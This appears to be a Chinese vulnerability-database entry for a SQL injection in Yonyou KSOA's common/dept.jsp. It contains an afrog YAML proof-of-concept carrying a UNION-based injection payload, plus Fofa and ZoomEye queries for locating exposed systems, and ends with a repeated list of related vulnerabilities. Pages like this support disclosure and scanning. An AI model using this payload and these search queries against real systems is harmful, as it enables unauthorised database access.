yonyou-ksoa-dept-sqli: 用友时空 KSOA common/dept.jsp SQL 注入漏洞

漏洞描述

Fofa: app="用友-时空KSOA" ZoomEye: app:"用友时空KSOA"

PoC代码[已公开]

id: yonyou-ksoa-dept-sqli

info:
  name: 用友时空 KSOA common/dept.jsp SQL 注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="用友-时空KSOA"
    ZoomEye: app:"用友时空KSOA"
  reference:
    - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
  tags: yonyou,ksoa,sqli
  created: 2023/12/09

rules:
  r0:
    request:
      method: GET
      path: /common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'12345'))--+
    expression: response.status == 200 && response.body.bcontains(b'0x827ccb0eea8a706') 
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yonyou-ksoa-dept-sqli.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

用友KSOA showCardInfo SQL注入漏洞 无POC

用友KSOA del_type.jsp SQL注入漏洞 无POC

用友KSOA 存在SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

用友KSOA showCardInfo SQL注入漏洞无POC

用友KSOA del_type.jsp SQL注入漏洞无POC

用友KSOA 存在SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC